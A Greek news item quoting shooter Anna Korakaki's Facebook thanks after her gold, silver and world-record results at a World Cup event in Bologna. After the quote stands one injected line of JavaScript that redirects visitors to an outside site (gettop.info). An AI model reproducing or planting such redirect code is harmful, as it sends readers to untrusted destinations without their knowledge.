Το «ευχαριστώ» της Κορακάκη σε όλους τους Έλληνες

0
7

 

«Δεν θα μπορούσα να ζητήσω ή να ζήσω τίποτα άλλο…» έγραψε η Άννα Κορακάκη στο Facebook επιστρέφοντας από την Μπολόνια, με τα δύο μετάλλια που κέρδισε στο Παγκόσμιο Κύπελλο Σκοποβολής, ενώ ευχαρίστησε όλους τους Έλληνες που όπως έγραψε ακολουθούν τους αγώνες της και την εμψυχώνουν με τις ευχές και τα μηνύματά τους.

Συγκεκριμένα στον λογαριασμό της στο Facebook έγραψε:

«Δεν θα μπορούσα να ζητήσω ή να ζήσω τίποτα άλλο…Μόλις επιστρέψαμε από Ιταλία και νιώθω καλύτερα από ποτέ, πιο περήφανη από ποτέ, πιο ευτυχισμένη από ποτέ! Ο απολογισμός: δύο μέρες, ένα χρυσό, ένα ασημένιο και 2 Παγκόσμια Ρεκόρ!

Δίνοντας τον τελευταίο μου αγώνα σαν νεάνιδα -συμμετέχοντας φυσικά για ακόμη μια φορά σε αγώνα γυναικών και αποκλειστικά των καλύτερων του κόσμου- ισοφάρισα με 391 το παγκόσμιο ρεκόρ νεανίδων. Στον τελικό, το παγκόσμιο ρεκόρ τελικού! Έτσι, η σημαία μας και το όνομα μου έχουν πλέον μπει στη λίστα των κατόχων παγκοσμίων ρεκόρ!Θέλω να ευχαριστήσω από καρδιάς όλους τους Έλληνες της Μπολόνια που βρέθηκαν στο σκοπευτήριο και τις δύο ημέρες στους τελικούς μου και με υποστήριξαν με τον καλύτερο τρόπο και φυσικά όλους τους Έλληνες, στην Ελλάδα ή το εξωτερικό, που ακολουθείτε τους αγώνες μου και με εμψυχώνετε με τις ευχές και τα μηνύματά σας!»

setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here